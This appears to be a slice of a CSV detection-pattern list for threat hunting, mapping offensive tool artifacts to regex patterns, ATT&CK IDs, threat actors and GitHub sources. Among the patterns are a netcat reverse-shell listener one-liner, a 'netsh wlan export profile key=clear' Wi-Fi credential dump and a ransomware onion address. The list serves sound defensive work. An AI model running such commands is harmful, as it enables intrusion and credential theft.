"*stinger_client.py*",".{0,1000}stinger_client\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60413"
"*stinger_server.exe*",".{0,1000}stinger_server\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. It can be directly used by metasploit-framework - viper- cobalt strike for session online.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/FunnyWolf/pystinger","1","1","N/A","N/A","10","10","1397","205","2021-09-29T13:13:43Z","2019-09-29T05:23:54Z","60414"
"*stolen_passwords.txt*",".{0,1000}stolen_passwords\.txt.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","60415"
"*StompySharps.csproj*",".{0,1000}StompySharps\.csproj.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60416"
"*StompySharps.exe*",".{0,1000}StompySharps\.exe.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60417"
"*StompySharps.sln*",".{0,1000}StompySharps\.sln.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","60418"
"*stopdaisy*",".{0,1000}stopdaisy.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60421"
"*StopInveigh*",".{0,1000}StopInveigh.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Invoke-InveighRelay.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60422"
"*-stop-keylogger*",".{0,1000}\-stop\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","60423"
"*stop-keystrokes*",".{0,1000}stop\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60424"
"*stormshadow07*",".{0,1000}stormshadow07.{0,1000}","offensive_tool_keyword","HackTheWorld","An Python Script For Generating Payloads that Bypasses All Antivirus so far","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","1","N/A","N/A","N/A","10","977","169","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z","60548"
"*Stowaway/admin/process*",".{0,1000}Stowaway\/admin\/process.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","60549"
"*STRING firefox about:logins*",".{0,1000}STRING\sfirefox\sabout\:logins.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot  to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","60551"
"*String k = ""e45e329feb5d925b""*",".{0,1000}String\sk\s\=\s\""e45e329feb5d925b\"".{0,1000}","offensive_tool_keyword","POC","CVE-2021-21972 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/NS-Sp4ce/CVE-2021-21972","1","0","#content","N/A","7","5","491","146","2023-06-08T04:01:33Z","2021-02-24T11:14:58Z","60552"
"*string maliciousCommand =*",".{0,1000}string\smaliciousCommand\s\=.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","0","N/A","N/A","9","2","106","17","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z","60553"
"*String netsh wlan export profile key=clear*",".{0,1000}String\snetsh\swlan\sexport\sprofile\skey\=clear.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","60554"
"*strip_bof.ps1*",".{0,1000}strip_bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","1","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","60556"
"*strip2john.py*",".{0,1000}strip2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","60557"
"*strip-bof -Path *",".{0,1000}strip\-bof\s\-Path\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A Visual Studio template used to create Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/securifybv/Visual-Studio-BOF-template","1","0","N/A","N/A","10","10","304","55","2021-11-17T12:03:42Z","2021-11-13T13:44:01Z","60558"
"*StrongLoader_x64.exe*",".{0,1000}StrongLoader_x64\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","60559"
"*struct sockaddr_in revsockaddr*",".{0,1000}struct\ssockaddr_in\srevsockaddr.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60560"
"*struts_ext_v2.jar*",".{0,1000}struts_ext_v2\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","network exploitation tool","N/A","10","3533","676","2025-03-05T12:04:51Z","2020-01-25T02:07:37Z","60561"
"*stty raw -echo; (stty size; cat) | nc -lvnp*",".{0,1000}stty\sraw\s\-echo\;\s\(stty\ssize\;\scat\)\s\|\snc\s\-lvnp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","60562"
"*sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd.onion*",".{0,1000}sty5r4hhb5oihbq2mwevrofdiqbgesi66rvxr5sr573xgvtuvr4cs5yd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","60564"
"*su rootz*",".{0,1000}su\srootz.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/ahrixia/CVE_2022_0847","1","0","N/A","N/A","N/A","1","21","15","2022-03-08T13:15:35Z","2022-03-08T12:43:43Z","60567"
"*su_brute_user_num*",".{0,1000}su_brute_user_num.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","60568"
"*subbrute.exe*",".{0,1000}subbrute.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60569"
"*subbrute.py -*",".{0,1000}subbrute\.py\s\-.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60570"
"*subbrute_windows.zip*",".{0,1000}subbrute_windows\.zip.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","60571"
"*subdomain_takeovers.py*",".{0,1000}subdomain_takeovers\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60572"
"*subdomain-enumeration.py*",".{0,1000}subdomain\-enumeration\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","60573"
"*subdomains-100.txt*",".{0,1000}subdomains\-100\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60574"
"*subdomains-1000.txt*",".{0,1000}subdomains\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60575"
"*subdomains-10000.txt*",".{0,1000}subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60576"
"*subdomains-500.txt*",".{0,1000}subdomains\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60577"
"*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","60578"
"*subdomains-top1million-110000.txt*",".{0,1000}subdomains\-top1million\-110000\.txt.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60579"
"*subdomains-top1million-20000.txt*",".{0,1000}subdomains\-top1million\-20000\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","60580"
"*subdomains-uk-1000.txt*",".{0,1000}subdomains\-uk\-1000\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60581"
"*subdomains-uk-500.txt*",".{0,1000}subdomains\-uk\-500\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","N/A","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","60582"
"*subdomain-wordlist.txt*",".{0,1000}subdomain\-wordlist\.txt.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","N/A","10","1372","212","2025-04-16T11:41:00Z","2020-06-06T20:17:55Z","60583"
"*subfinder -d *",".{0,1000}subfinder\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60584"
"*subfinder -silent -d *",".{0,1000}subfinder\s\-silent\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60585"
"*subfinder --silent*",".{0,1000}subfinder\s\-\-silent.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","60586"
"*subfinder*",".{0,1000}subfinder.{0,1000}","offensive_tool_keyword","subfinder","SubFinder is a subdomain discovery tool that discovers valid subdomains for any target using passive online sources.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/subfinder/subfinder","1","0","N/A","N/A","5","10","11549","1359","2025-04-22T09:43:17Z","2018-03-31T09:44:57Z","60587"
"*sublist3r -v -d *",".{0,1000}sublist3r\s\-v\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","60588"
"*sublist3r.py*",".{0,1000}sublist3r\.py.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","60589"
